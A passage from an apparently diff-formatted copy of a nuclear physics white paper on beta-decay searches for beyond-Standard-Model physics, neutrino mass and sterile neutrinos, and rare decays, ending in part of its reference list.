+ term provide important constraints on BSM physics. On-
380
+ going and planned experiments are poised to further re-
381
+ fine these measurements, continuing to reach sensitivities
382
+ that surpass that of the LHC.
383
+ Nuclei that undergo allowed nuclear β decay provide
384
+ excellent laboratories for these types of measurements.
385
+ The underlying nature of the electroweak interaction can
386
+ be isolated because the uncertainties associated with the
387
+ nuclear medium are minimized. The nuclear-physics cor-
388
+ rections that arise are typically of order 1%; as these
389
+ measurements now aim for 0.1% precision or beyond,
390
+ these corrections need to be carefully understood through
391
+ nuclear-theory calculations and experimental constraints
392
+ when possible. In addition, in certain select cases, pre-
393
+ cise β-shape functions for forbidden β decays can access
394
+ exotic couplings that are not accessible with allowed de-
395
+ cays [55]. Measurements of spin asymmetry in EC decay
396
+ of polarized nuclei are also proposed, taking advantage
397
+ of its linear dependence on exotic couplings.
398
+
399
+ 5
400
+ B.
401
+ Progress
402
+ Over the past decade, experimental developments
403
+ paired with modern nuclear-theory calculations have
404
+ yielded a new generation of β-decay studies that continue
405
+ to reach unprecedented sensitivity.
406
+ Atom-trap and ion-trap techniques have been used to
407
+ collect and suspend samples of β-emitting isotopes in vac-
408
+ uum, allowing both the measurement of the low-energy
409
+ nuclear recoils, from which the neutrino momentum can
410
+ be inferred, and the opportunity to polarize the confined
411
+ nuclei. Experiments with the BPT at the ATLAS facil-
412
+ ity at ANL, have achieved increasingly precise results for
413
+ the β-ν angular correlations in 8Li [4, 56] and 8B [57].
414
+ Atom traps have been used to determine this correlation
415
+ in 6He [58] and to polarize 37K atoms to measure the
416
+ β asymmetry [44, 45]. These experiments have achieved
417
+ precision as good as 0.3%, placing stringent limits on the
418
+ possible existence of tensor interactions and right-handed
419
+ currents, and there are well-defined paths to further im-
420
+ prove the precision.
421
+ In addition, new ultra-sensitive detection techniques
422
+ have been demonstrated that will undoubtedly increase
423
+ the precision of angular-correlation measurements. The
424
+ CRES measurement approach, first demonstrated with
425
+ low-energy electrons, has recently been applied to the
426
+ study of higher-energy β particles from the decays of
427
+ 6He and 19Ne [59].
428
+ The implantation of β-emitters in
429
+ ultrahigh-resolution cryogenic detectors and scintillator
430
+ detectors also show great promise by capturing the full
431
+ energy of the recoiling nucleus or the emitted β particle.
432
+ At the same time, significant theoretical progress has
433
+ been made in nuclear ab initio methods for precision cal-
434
+ culations of β-decay observables, including energy spec-
435
+ tra and angular correlations. Combined with a recent re-
436
+ view and extension of allowed β decay spectroscopy cor-
437
+ rections [60], as well as shape and recoil corrections for
438
+ allowed and forbidden β decays [61], several independent
439
+ calculations have provided precision input for interpreta-
440
+ tion of β decays in 6He [62, 63] and 8Li [64], which vastly
441
+ improves upon the previous state of the art. As shown in
442
+ Ref. [64], highly reduced theoretical uncertainties have
443
+ been achieved by identifying a strong correlation between
444
+ the recoil-order terms and quadrupole moments, which
445
+ emphasizes the significance of the proper treatment of
446
+ collective features in nuclei, including ab initio predic-
447
+ tions of quadrupole moments and E2 transitions without
448
+ effective charges. Similar efforts are underway for addi-
449
+ tional decays to ensure theoretical precision at the 0.01%
450
+ level, thereby enabling discovery potential at the 10-TeV
451
+ level. Comparison of β decay in consecutive isotopes is
452
+ very important as there is no good understanding of in-
453
+ terplay between the weak and strong interaction that is
454
+ responsible for collective vibrations and rotations that
455
+ can influence Gamow-Teller decays [65].
456
+ C.
457
+ Prospects
458
+ This is a particularly exciting time for the search for
459
+ BSM physics with nuclear β decay. Existing efforts have
460
+ matured to the point where they are providing probes of
461
+ new physics that are competitive (and complementary)
462
+ with the reach of the LHC, and additional reach is immi-
463
+ nent. In addition to increased sensitivity to be obtained
464
+ by atom and ion trap based experiments, a set of new
465
+ approaches are being developed to determine the β spec-
466
+ tral shape to unprecedented precision, therefore greatly
467
+ increasing the ability to determine the Fierz interference
468
+ term.
469
+ Further increase in sensitivity using the mass-8 system
470
+ is being pursued and will require access to high-intensity
471
+ beams of 8Li and 8B. New trap-structure designs to min-
472
+ imize β-particle scattering and efforts to better charac-
473
+ terize the detector-array performance will further reduce
474
+ uncertainties. In addition, a better understanding of the
475
+ low-lying continuum level structure of 8Be, including re-
476
+ solving the question of the existence of low-lying intruder
477
+ states, and the associated recoil-order contributions will
478
+ be needed.
479
+ Additional devices like TAMUTRAP and St.
480
+ Bene-
481
+ dict are poised to further extend the reach of precision
482
+ angular-correlation measurements. A recent global fit of
483
+ nuclear and neutron beta decay data show a hint of BSM
484
+ tensor coupling to right-handed neutrinos at the 3σ-level
485
+ [66]. This effect, that could be generated by various BSM
486
+ effects such as a TeV-range leptoquark coupling to light
487
+ quarks, positrons, and right-handed neutrinos, can only
488
+ be seen with the inclusion of correlation measurement
489
+ data of mirror transitions in the data set. Hence, there
490
+ is a critical need to expend the mirror transition corre-
491
+ lation measurement data set using instruments such as
492
+ St. Benedict to better constrain this effect. Finally, the
493
+ HUNTER collaboration is proposing a precision EC spin
494
+ asymmetry measurement for which linear dependence on
495
+ tensor couplings offers strong potential for advances.
496
+ The CRES approach can be used to determine the
497
+ spectral shapes of the 6He and 19Ne decays. By study-
498
+ ing both β− and β+ decays, the sign of the Fierz inter-
499
+ ference term changes sign, and therefore measuring both
500
+ significantly reduces most systematic effects. In addition,
501
+ by confining β-emitters in a specially-designed Penning
502
+ trap for CRES measurements, the approach can be ex-
503
+ tended to study any isotope, including nuclei that decay
504
+ by pure Fermi transitions and enable increased sensitiv-
505
+ ity to scalar interactions. As high precision methods for
506
+ spectrum measurement are refined, sub 0.1% precision
507
+ in spectral observables can enable a direct analysis of
508
+ endpoint-related effects in the electroweak radiative cor-
509
+ rections as well.
510
+ Quantum sensors will enable high-precision nuclear-
511
+ recoil spectroscopy following β decay for a wide range
512
+
513
+ 6
514
+ of accessible isotopes in experiments such as SALER at
515
+ FRIB. In addition to competitive determinations of Vud,
516
+ precision measurements recoil spectra following beta de-
517
+ cay and the relative decay fractions into electron capture
518
+ and β+ branches provide a sensitivity enhancement to
519
+ a non-zero Fierz interference term with substantially re-
520
+ duced nuclear corrections.
521
+ Similar to the 8Li beta decay [64], ab initio calculations
522
+ of 8B beta decay recoil-order corrections are ongoing to
523
+ help reduce the uncertainty on the tensor current limits
524
+ from the β-ν angular correlation measurements in this
525
+ nucleus. Given the collective and cluster nature of the
526
+ decay product 8Be, as well as the near-threshold ground
527
+ state of 8B, ab initio approaches that use hybrid basis
528
+ such as symmetry-adapted and continuum bases allow
529
+ one to reliably compute such contributions. Furthermore,
530
+ with the help of the symmetry-adapted basis one can ex-
531
+ tend the calculations to heavier systems such as 19Ne.
532
+ Future experiments would benefit from having the en-
533
+ ergy dependence of the recoil-order terms, which can be
534
+ obtained by computing their response functions.
535
+ V.
536
+ BETA DECAYS FOR NEUTRINO PHYSICS
537
+ A.
538
+ Motivation
539
+ The lepton sector of the SM provides a unique window
540
+ into BSM physics given the confirmed observation of non-
541
+ zero neutrino masses [67, 68], the persisting hint of the
542
+ muon g − 2 anomaly [69], and several other outstanding
543
+ claims of leptonic BSM physics. As a result, extensions to
544
+ the SM description of leptons are unavoidable and must
545
+ account for the fact that neutrinos have at least two non-
546
+ zero mass eigenstates. The search for how to extend the
547
+ SM in this area may indeed lead us to a wide range of
548
+ BSM physics, including a connection to the dark sector.
549
+ B.
550
+ Progress and future - BSM neutrino masses
551
+ Energy and momentum conservation in nuclear β de-
552
+ cay allows model-independent searches for any new neu-
553
+ trino mass physics coupled to the electron flavor, and is
554
+ a uniquely powerful method for BSM physics searches
555
+ in this area. This includes the absolute neutrino mass
556
+ measurements of the light mass states via β decay end-
557
+ point measurements as well as the search for new, heavy
558
+ (mostly sterile) mass states as an expansion to the 3 × 3
559
+ PMNS matrix.
560
+ 1.
561
+ Absolute neutrino mass measurements
562
+ Tritium β decay remains one of the most sensitive mea-
563
+ surements of the absolute neutrino mass scale, indepen-
564
+ dent of the nature of the neutrino mass (Majorana or
565
+ Dirac). Currently, the KATRIN neutrino experiment has
566
+ set the most stringent limit on the neutrino mass scale of
567
+ mβ ≤ 0.8 eV/c2 at 90% C.L. using molecular tritium [70],
568
+ with a final target mass sensitivity of mβ ≤ 0.2 eV/c2
569
+ at 90% C.L. The Project 8 experiment, which uses the
570
+ CRES technique to measure electrons from β decay, is de-
571
+ veloping an R&D program for an atomic tritium source,
572
+ with a target sensitivity of mβ ≤ 0.04 eV/c2 at 90%
573
+ C.L. [71]. This is among the highest-impact physics cases
574
+ in the β decay community, however since a separate, ded-
575
+ icated whitepaper will be forthcoming from these collab-
576
+ orations we do not emphasize it here.
577
+ To go beyond mβ ≤ 0.04 eV/c2, however, new exper-
578
+ imental paradigms must be considered. Of growing in-
579
+ terest are ultra-low Q value β-decays that would occur
580
+ from the ground state of the parent isotope to an excited
581
+ nuclear state in the daughter with QES = QGS − E∗ ≲ 1
582
+ keV. Such decays could provide new candidates for direct
583
+ neutrino mass determination experiments [72] and fur-
584
+ ther insight into atomic interference effects in β-decay at
585
+ low energies [73]. A number of isotopes have been found
586
+ that could have an ultra-low Q value transition [74–79],
587
+ but more precise Q value (from Penning traps), and in
588
+ some cases energy level data is needed [80–85]. Experi-
589
+ mentally, these ultra-low Q values are challenging to im-
590
+ plement, however recent work with trapped nanoscale
591
+ objects may permit a variety of isotopes to be char-
592
+ acterized while reaching sensitivities that are sufficient
593
+ to resolve the requisite momenta in a single nuclear de-
594
+ cay [86]. Solid materials allow a high density of nuclei to
595
+ be confined in a trap, and enable control and readout of
596
+ the motional state of the particle using tools from quan-
597
+ tum optomechanics. Although challenging, it is plausible
598
+ that smaller particles may eventually reach the momen-
599
+ tum sensitivity needed to detect the mass of the light
600
+ SM neutrinos. If an ultra-low Q value EC or β transition
601
+ (≤ 0.1 keV) were also identified with sufficiently high de-
602
+ cay rate, detection of the light neutrino masses with this
603
+ technique may be possible [86].
604
+ 2.
605
+ Direct search for sub-MeV sterile neutrinos
606
+ The search for sub-MeV sterile neutrinos via precision
607
+ nuclear decay measurements is among the most powerful
608
+ methods for BSM massive-neutrino searches since it relies
609
+ only on the existence of a heavy neutrino admixture to
610
+ the active neutrinos, and not on the model-dependent de-
611
+ tails of their interactions. Sub-MeV sterile neutrinos are
612
+ well motivated, natural extensions to the Standard Model
613
+ (SM) that have been extensively studied over the past 25
614
+ years [88–90]. To date, the vast majority of laboratory-
615
+ based experimental searches for neutrinos in this mass
616
+ range have been performed using momentum and energy
617
+ conservation in nuclear β decay. The neutrino “missing
618
+
619
+ 7
620
+ 1
621
+
622
+ 10
623
+ 1
624
+ 10
625
+ 2
626
+ 10
627
+ 3
628
+ 10
629
+ 4
630
+ 10
631
+ 5
632
+ 10
633
+ 6
634
+ 10
635
+ 7
636
+ 10
637
+ )
638
+ 2
639
+ (eV/c
640
+ 4
641
+ m
642
+ 10
643
+
644
+ 10
645
+ 9
646
+
647
+ 10
648
+ 8
649
+
650
+ 10
651
+ 7
652
+
653
+ 10
654
+ 6
655
+
656
+ 10
657
+ 5
658
+
659
+ 10
660
+ 4
661
+
662
+ 10
663
+ 3
664
+
665
+ 10
666
+ 2
667
+
668
+ 10
669
+ 1
670
+
671
+ 10
672
+ 1
673
+ θ
674
+ 2
675
+ = sin
676
+ 2|
677
+ e4
678
+ |U
679
+ Historical Limits
680
+ BeEST
681
+ DUNE
682
+ HUNTER
683
+ KATRIN, TRISTAN
684
+ Project 8
685
+ β
686
+ β
687
+ ν
688
+ 2
689
+ Figure 2.
690
+ Projected sensitivities for heavy sterile neutrino
691
+ searches in the eV - MeV mass range for current and planned
692
+ experiments including the KATRIN/TRISTAN, Project-8,
693
+ HUNTER, and the BeEST. Figure from Snowmass 2022 [87].
694
+ mass" is reconstructed using precise momentum measure-
695
+ ment of all other products (including the recoil nucleus)
696
+ from decay of a nucleus at rest. The experimental situa-
697
+ tion is simplified dramatically in neutron-deficient nuclei
698
+ where the 3-body β decay mode is energetically forbid-
699
+ den, and thus the parent nucleus only undergoes nuclear
700
+ electron capture (EC) decay. Precision measurement of
701
+ the low-energy nuclear recoil and all the other (low en-
702
+ ergy) decay products allows the neutrino four-momentum
703
+ and mass to be directly probed. Measurements of this
704
+ type are currently being performed using 7Be decay by
705
+ the BeEST experiment [53, 54, 91] and planned for 131Cs
706
+ by the HUNTER experiment [92]. The projected limits
707
+ from these experiments are impressive (Fig. 2) and will
708
+ provide the most stringent constraints on the existence of
709
+ these particles. In fact, the BeEST experiment currently
710
+ sets the best laboratory limits in the 100 - 850 keV mass
711
+ range of any experimental method [54].
712
+ C.
713
+ Other prospects
714
+ β decay measurements not only provide direct probes
715
+ of BSM physics but also support other exotic neutrino
716
+ physics searches, including:
717
+ • Reactor-Antineutrino Anomaly (RAA) – Experi-
718
+ mental β-shape functions are needed in order to
719
+ get to % level ¯ν flux predictions [93–99].
720
+ • Precisely measure dominant backgrounds for dark
721
+ matter searches and for neutrino-less-double β de-
722
+ cays (0νββ) [100].
723
+ Nuclear theory also plays a critical role in this area.
724
+ In particular, neutrinoless double beta (0νββ) decay nu-
725
+ clear matrix elements [101–104], precision β- and EC-
726
+ decay spectral calculations [55, 60, 99, 105], and neutrino-
727
+ nucleus interactions. Both experimental and theoretical
728
+ spectroscopy efforts to resolve shape factors of forbid-
729
+ den beta decays in the fission fragment region and their
730
+ inclusion in nuclear databases has been recognized as a
731
+ significant goal for the reactor neutrino field [106].
732
+ VI.
733
+ RARE DECAYS
734
+ A.
735
+ Motivation
736
+ Rare decays in the nuclear domain may represent
737
+ a window for the study of unknown phenomena.
738
+ As
739
+ an example, it was suggested that the neutron lifetime
740
+ anomaly could be caused by a dark decay branch [107], on
741
+ which neutron star observables can provide strong con-
742
+ straints [108].
743
+ This could have as a consequence that
744
+ very loosely bound neutrons in exotic nuclei could decay
745
+ in a similar way, and the residual nucleus would be the
746
+ signature of such a decay [109].
747
+ B.
748
+ Progress and future prospects
749
+ A promising candidate is the decay of 11Be where the
750
+ dark decay would produce 10Be as residue.
751
+ 11Be also
752
+ has a (β, p) decay branching leading to 10Be (an unusual
753
+ decay for a neutron rich nucleus) that was measured re-
754
+ cently [110]. It was confirmed that this decay proceeds
755
+ via a near threshold resonance in 11B [111, 112]. This
756
+ resonance near threshold can be considered as an exam-
757
+ ple of an open quantum system resonance. The question
758
+ if there is, or if there is not, a signature for a dark decay
759
+ is not yet solved because of scattered results on the 10Be
760
+ production ratio [113]. Another case that was measured
761
+ in 2021 is the β decay of 6He and search of a dark neu-
762
+ tron decay to the unbound 5He that can be probed by
763
+ the following neutron decay to 4He. A very low upper
764
+ limit was found in this case [114]. More generally, rare
765
+ decays will favor visibility of higher order effects because
766
+ they may become competitive with respect to standard
767
+ interactions.
768
+ [1] J. Behr, A. Gorelov, K. Jackson, M. Pearson, M. An-
769
+ holm, T. Kong, R. Behling, B. Fenker, D. Melco-
770
+ nian, D. Ashery, et al., Hyperfine Interactions 225, 115
771
+ (2014).
772
+ [2] D. M. Asner, R. F. Bradley, L. de Viveiros, P. J. Doe,
773
+ J. L. Fernandes, M. Fertl, E. C. Finn, J. A. Formaggio,
774
+ D. Furse, A. M. Jones, J. N. Kofron, B. H. LaRoque,
775
+ M. Leber, E. L. McBride, M. L. Miller, P. Mohan-
776
+ murthy, B. Monreal, N. S. Oblath, R. G. H. Robertson,
777
+ L. J. Rosenberg, G. Rybka, D. Rysewyk, M. G. Stern-
778
+
779
+ 8
780
+ berg, J. R. Tedeschi, T. Thümmler, B. A. VanDevender,
781
+ and N. L. Woods (Project 8 Collaboration), Phys. Rev.
782
+ Lett. 114, 162501 (2015).
783
+ [3] I. Mardor, O. Aviv, M. Avrigeanu, D. Berkovits, A. Da-
784
+ han, T. Dickel, I. Eliyahu, M. Gai, I. Gavish-Segev,
785
+ S. Halfon, et al., The European Physical Journal A 54,
786
+ 1 (2018).
787
+ [4] M. T. Burkey, G. Savard, A. T. Gallant, N. D. Scielzo,
788
+ J. A. Clark, T. Y. Hirsh, L. Varriano, G. H. Sargsyan,
789
+ K. D. Launey, M. Brodeur, D. P. Burdette, E. Heck-
790
+ maier, K. Joerres, J. W. Klimes, K. Kolos, A. Laminack,
791
+ K. G. Leach, A. F. Levand, B. Longfellow, B. Maaß,
792
+ S. T. Marley, G. E. Morgan, P. Mueller, R. Orford,
793
+ S. W. Padgett, A. Pérez Galván, J. R. Pierce, D. Ray,
794
+ R. Segel, K. Siegl, K. S. Sharma, and B. S. Wang, Phys.
795
+ Rev. Lett. 128, 202502 (2022).
796
+ [5] I. S. Towner and J. C. Hardy, Phys. Rev. C 82, 065501
797
+ (2010).
798
+ [6] J. C. Hardy and I. S. Towner, Journal of Physics G:
799
+ Nuclear and Particle Physics 41, 114004 (2014).
800
+ [7] M. Gonzalez-Alonso, O. Naviliat-Cuncic, and N. Sever-
801
+ ijns, Progress in Particle and Nuclear Physics 104, 165
802
+ (2019).
803
+ [8] V. Cirigliano, M. Gonzalez-Alonso, and M. L. Graesser,
804
+ JHEP 02, 046, arXiv:1210.4553 [hep-ph].
805
+ [9] J. C. Hardy and I. S. Towner, Reports on Progress in
806
+ Physics 73, 046301 (2010).
807
+ [10] C.-Y. Seng, M. Gorchtein, H. H. Patel, and M. J.
808
+ Ramsey-Musolf, Physical Review Letters 121, 241804
809
+ (2018), arXiv:1807.10197.
810
+ [11] C.
811
+ Y.
812
+ Seng,
813
+ M.
814
+ Gorchtein,
815
+ and
816
+ M.
817
+ J.
818
+ Ramsey-
819
+ Musolf,
820
+ Physical
821
+ Review
822
+ D
823
+ 100,
824
+ 013001
825
+ (2019),
826
+ arXiv:1812.03352.
827
+ [12] A. Czarnecki, W. J. Marciano, and A. Sirlin, Physical
828
+ Review D 100, 73008 (2019), arXiv:1907.06737.
829
+ [13] L. Hayen, Physical Review D 103, 113001 (2021),
830
+ arXiv:2010.07262.
831
+ [14] K. Shiells, P. G. Blunden, and W. Melnitchouk, Physical
832
+ Review D 104, 33003 (2021).
833
+ [15] X. Feng, M. Gorchtein, L. C. Jin, P. X. Ma, and
834
+ C. Y. Seng, Physical Review Letters 124, 192002 (2020),
835
+ arXiv:2003.09798.
836
+ [16] C. Y. Seng, X. Feng, M. Gorchtein, and L. C. Jin, Phys-
837
+ ical Review D 101, 111301 (2020).
838
+ [17] C.-Y. Seng and U.-G. Meißner, Phys. Rev. Lett. 122,
839
+ 211802 (2019), arXiv:1903.07969 [hep-ph].
840
+ [18] M. Gorchtein, Phys. Rev. Lett. 123, 042503 (2019),
841
+ arXiv:1812.04229 [nucl-th].
842
+ [19] J. C. Hardy and I. S. Towner, Phys. Rev. C 102, 045501
843
+ (2020).
844
+ [20] C.-Y. Seng and M. Gorchtein, (2022), arXiv:2211.10214
845
+ [nucl-th].
846
+ [21] S. Weinberg, Phys. Lett. B251, 288 (1990).
847
+ [22] S. Weinberg, Nuclear Physics B 363, 3 (1991).
848
+ [23] S. Weinberg, Phys. Lett. B295, 114 (1992), arXiv:hep-
849
+ ph/9209257 [hep-ph].
850
+ [24] R. Machleidt and F. Sammarruca, Physica Scripta 91,
851
+ 083007 (2016).
852
+ [25] G. B. King, L. Andreoli, S. Pastore, M. Piarulli, R. Schi-
853
+ avilla, R. B. Wiringa, J. Carlson, and S. Gandolfi, Physi-
854
+ cal Review C 102, 10.1103/physrevc.102.025501 (2020).
855
+ [26] E. Epelbaum, H. Krebs, and P. Reinert, Frontiers in
856
+ Physics 8, 98 (2020).
857
+ [27] U. van Kolck, Frontiers in Physics 8, 79 (2020).
858
+ [28] H.
859
+ Krebs,
860
+ Eur.
861
+ Phys.
862
+ J.
863
+ A
864
+ 56,
865
+ 234
866
+ (2020),
867
+ arXiv:2008.00974 [nucl-th].
868
+ [29] A. Baroni, G. B. King, and S. Pastore, Few Body Syst.
869
+ 62, 114 (2021), arXiv:2107.10721 [nucl-th].
870
+ [30] P. Gysbers, G. Hagen, J. D. Holt, G. R. Jansen,
871
+ T. D. Morris, P. Navrátil, T. Papenbrock, S. Quaglioni,
872
+ A. Schwenk, S. R. Stroberg, and K. A. Wendt, Nature
873
+ Physics 15, 428 (2019), arXiv:arXiv:1903.00047v1.
874
+ [31] H.
875
+ Hergert,
876
+ Frontiers
877
+ in
878
+ Physics
879
+ 8,
880
+ 10.3389/fphy.2020.00379 (2020).
881
+ [32] J. Carlson, M. J. Savage, R. Gerber, K. Antypas,
882
+ D. Bard, R. Coffey, E. Dart, S. Dosanjh, J. Hack,
883
+ I.
884
+ Monga,
885
+ M.
886
+ E.
887
+ Papka,
888
+ K.
889
+ Riley,
890
+ L.
891
+ Rotman,
892
+ T. Straatsma, J. Wells, H. Avakian, Y. Ayyad, S. A.
893
+ Bass, D. Bazin, A. Boehnlein, G. Bollen, L. J. Brous-
894
+ sard,
895
+ A. Calder,
896
+ S. Couch,
897
+ A. Couture,
898
+ M. Cro-
899
+ maz, W. Detmold, J. Detwiler, H. Duan, R. Ed-
900
+ wards, J. Engel, C. Fryer, G. M. Fuller, S. Gandolfi,
901
+ G. Gavalian, D. Georgobiani, R. Gupta, V. Gyur-
902
+ jyan, M. Hausmann, G. Heyes, W. R. Hix, M. ito,
903
+ G. Jansen, R. Jones, B. Joo, O. Kaczmarek, D. Kasen,
904
+ M. Kostin, T. Kurth, J. Lauret, D. Lawrence, H.-W.
905
+ Lin, M. Lin, P. Mantica, P. Maris, B. Messer, W. Mit-
906
+ tig, S. Mosby, S. Mukherjee, H. A. Nam, P. Navratil,
907
+ W. Nazarewicz, E. Ng, T. O’Donnell, K. Orginos,
908
+ F. Pellemoine, P. Petreczky, S. C. Pieper, C. H. Pinken-
909
+ burg, B. Plaster, R. J. Porter, M. Portillo, S. Pratt,
910
+ M. L. Purschke, J. Qiang, S. Quaglioni, D. Richards,
911
+ Y. Roblin, B. Schenke, R. Schiavilla, S. Schlichting,
912
+ N. Schunck, P. Steinbrecher, M. Strickland, S. Syrit-
913
+ syn, B. Terzic, R. Varner, J. Vary, S. Wild, F. Win-
914
+ ter, R. Zegers, H. Zhang, V. Ziegler, and M. Zingale
915
+ 10.2172/1369223 (2017).
916
+ [33] P. D. Shidling, D. Melconian, S. Behling, B. Fenker,
917
+ J. C. Hardy, V. E. Iacob, E. McCleskey, M. McCleskey,
918
+ M. Mehlman, H. I. Park, and B. T. Roeder, Phys. Rev.
919
+ C 90, 032501 (2014).
920
+ [34] P. D. Shidling, R. S. Behling, B. Fenker, J. C. Hardy,
921
+ V. E. Iacob, M. Mehlman, H. I. Park, B. T. Roeder, and
922
+ D. Melconian, Phys. Rev. C 98, 015502 (2018).
923
+ [35] I. Iacob et al., (2022), in preparation.
924
+ [36] A. Ozmetin et al., (2022), in preparation.
925
+ [37] A. A. Valverde, M. Brodeur, T. Ahn, J. Allen, D. W.
926
+ Bardayan, F. D. Becchetti, D. Blankstein, G. Brown,
927
+ D. P. Burdette, B. Frentz, G. Gilardy, M. R. Hall,
928
+ S. King, J. J. Kolata, J. Long, K. T. Macon, A. Nel-
929
+ son, P. D. O’Malley, M. Skulski, S. Y. Strauss, and
930
+ B. Vande Kolk, Phys. Rev. C 97, 035503 (2018).
931
+ [38] J. Long, C. R. Nicoloff, D. W. Bardayan, F. D. Bec-
932
+ chetti, D. Blankstein, C. Boomershine, D. P. Burdette,
933
+ M. A. Caprio, L. Caves, P. J. Fasano, B. Frentz, S. L.
934
+ Henderson, J. M. Kelly, J. J. Kolata, B. Liu, P. D.
935
+ O’Malley, S. Y. Strauss, R. Zite, and M. Brodeur, Phys.
936
+ Rev. C 106, 045501 (2022).
937
+ [39] D. P. Burdette, M. Brodeur, D. W. Bardayan, F. D.
938
+ Becchetti, D. Blankstein, C. Boomershine, L. Caves,
939
+ S. L. Henderson, J. J. Kolata, B. Liu, J. Long, P. D.
940
+ O’Malley, and S. Y. Strauss, Phys. Rev. C 101, 055504
941
+ (2020).
942
+ [40] J. Long, T. Ahn, J. Allen, D. W. Bardayan, F. D.
943
+ Becchetti, D. Blankstein, M. Brodeur, D. Burdette,
944
+ B. Frentz, M. R. Hall, J. M. Kelly, J. J. Kolata, P. D.
945
+ O’Malley, B. E. Schultz, S. Y. Strauss, and A. A.
946
+ Valverde, Phys. Rev. C 96, 015502 (2017).
947
+
948
+ 9
949
+ [41] J. Long, M. Brodeur, M. Baines, D. W. Bardayan,
950
+ F. D. Becchetti, D. Blankstein, C. Boomershine, D. P.
951
+ Burdette, A. M. Clark, B. Frentz, S. L. Henderson,
952
+ J. M. Kelly, J. J. Kolata, B. Liu, K. T. Macon, P. D.
953
+ O’Malley, A. Pardo, C. Seymour, S. Y. Strauss, and
954
+ B. Vande Kolk, Phys. Rev. C 101, 015501 (2020).
955
+ [42] K. Gulyuz, G. Bollen, M. Brodeur, R. A. Bryce,
956
+ K. Cooper, M. Eibach, C. Izzo, E. Kwan, K. Manukyan,
957
+ D. J. Morrissey,
958
+ O. Naviliat-Cuncic,
959
+ M. Redshaw,
960
+ R.
961
+ Ringle,
962
+ R.
963
+ Sandler,
964
+ S.
965
+ Schwarz,
966
+ C.
967
+ S.
968
+ Sum-
969
+ ithrarachchi, A. A. Valverde, and A. C. C. Villari, Phys.
970
+ Rev. Lett. 116, 012501 (2016).
971
+ [43] M. Eibach, G. Bollen, M. Brodeur, K. Cooper, K. Gu-
972
+ lyuz, C. Izzo, D. J. Morrissey, M. Redshaw, R. Ringle,
973
+ R. Sandler, S. Schwarz, C. S. Sumithrarachchi, A. A.
974
+ Valverde, and A. C. C. Villari, Phys. Rev. C 92, 045502
975
+ (2015).
976
+ [44] B. Fenker, J. A. Behr, D. Melconian, R. M. A. An-
977
+ derson, M. Anholm, D. Ashery, R. S. Behling, I. Co-
978
+ hen, I. Craiciu, J. M. Donohue, C. Farfan, D. Friesen,
979
+ A. Gorelov,
980
+ J. McNeil,
981
+ M. Mehlman,
982
+ H. Norton,
983
+ K. Olchanski, S. Smale, O. Thériault, A. N. Vantyghem,
984
+ and C. L. Warner, New Journal of Physics 18, 073028
985
+ (2016).
986
+ [45] B. Fenker, A. Gorelov, D. Melconian, J. A. Behr, M. An-
987
+ holm, D. Ashery, R. S. Behling, I. Cohen, I. Craiciu,
988
+ G. Gwinner, J. McNeil, M. Mehlman, K. Olchanski,
989
+ P. D. Shidling, S. Smale, and C. L. Warner, Phys. Rev.
990
+ Lett. 120, 062502 (2018).
991
+ [46] C.-Y. Seng and M. Gorchtein, (2022), arXiv:2208.03037
992
+ [nucl-th].
993
+ [47] C.-Y. Seng, (2022), arXiv:2212.02681 [nucl-th].
994
+ [48] P. Shidling et al., Int. J. Mass Spectr. 468, 116636
995
+ (2021).
996
+ [49] O. Naviliat-Cuncic and N. Severijns, Phys. Rev. Lett.
997
+ 102, 142302 (2009).
998
+ [50] L. Hayen and A. R. Young, Consistent description of an-
999
+ gular correlations in β decay for beyond standard model
1000
+ physics searches (2020), arXiv:2009.11364 [nucl-th].
1001
+ [51] M. Brodeur,
1002
+ J. Kelly,
1003
+ J. Long,
1004
+ C. Nicoloff, and
1005
+ B. Schultz, Nuclear Instruments and Methods in Physics
1006
+ Research Section B: Beam Interactions with Materials
1007
+ and Atoms 376, 281
1008
+ (2016), proceedings of the XVI-
1009
+ Ith International Conference on Electromagnetic Iso-
1010
+ tope Separators and Related Topics (EMIS2015), Grand
1011
+ Rapids, MI, U.S.A., 11-15 May 2015.
1012
+ [52] P. O’Malley, M. Brodeur, D. Burdette, J. Klimes,
1013
+ A. Valverde, J. Clark, G. Savard, R. Ringle, and V. Var-
1014
+ entsov, Nuclear Instruments and Methods in Physics
1015
+ Research Section B: Beam Interactions with Materials
1016
+ and Atoms 463, 488 (2020).
1017
+ [53] S. Fretwell, K. G. Leach, C. Bray, G. B. Kim, J. Dilling,
1018
+ A. Lennarz, X. Mougeot, F. Ponce, C. Ruiz, J. Stack-
1019
+ house, and S. Friedrich, Physical Review Letters 125,
1020
+ 32701 (2020).
1021
+ [54] S. Friedrich, G. B. Kim, C. Bray, R. Cantor, J. Dilling,
1022
+ S.
1023
+ Fretwell,
1024
+ J.
1025
+ A.
1026
+ Hall,
1027
+ A.
1028
+ Lennarz,
1029
+ V.
1030
+ Lordi,
1031
+ P. Machule,
1032
+ D. McKeen,
1033
+ X. Mougeot,
1034
+ F. Ponce,
1035
+ C. Ruiz, A. Samanta, W. K. Warburton, and K. G.
1036
+ Leach, Physical Review Letters 126, 021803 (2021),
1037
+ arXiv:2010.09603.
1038
+ [55] A. Glick-Magid, Y. Mishnayot, I. Mukul, M. Hass,
1039
+ S. Vaintraub, G. Ron, and D. Gazit, Physics Letters
1040
+ B 767, 285 (2017).
1041
+ [56] M. G. Sternberg, R. Segel, N. D. Scielzo, G. Savard,
1042
+ J. A. Clark, P. F. Bertone, F. Buchinger, M. Burkey,
1043
+ S. Caldwell, A. Chaudhuri, J. E. Crawford, C. M.
1044
+ Deibel, J. Greene, S. Gulick, D. Lascar, A. F. Levand,
1045
+ G. Li, A. Pérez Galván, K. S. Sharma, J. Van Schelt,
1046
+ R. M. Yee, and B. J. Zabransky, Phys. Rev. Lett. 115,
1047
+ 182501 (2015).
1048
+ [57] A. T. Gallant et al. (2022), submitted to Phys. Rev.
1049
+ Lett.
1050
+ [58] P. Müller et al., Phys. Rev. Lett. 129, 182502 (2022).
1051
+ [59] W. Byron et al., First observation of cyclotron radiation
1052
+ from mev-scale e± following nuclear beta decay (2022),
1053
+ arXiv:2209.02870.
1054
+ [60] L. Hayen, N. Severijns, K. Bodek, D. Rozpedzik, and
1055
+ X. Mougeot, Reviews of Modern Physics 90, 015008
1056
+ (2018), arXiv:1709.07530.
1057
+ [61] A. Glick-Magid and D. Gazit, Journal of Physics G:
1058
+ Nuclear and Particle Physics 49, 105105 (2022).
1059
+ [62] G. B. King, A. Baroni, V. Cirigliano, S. Gandolfi,
1060
+ L. Hayen, E. Mereghetti, S. Pastore, and M. Piarulli,
1061
+ (2022), arXiv:2207.11179.
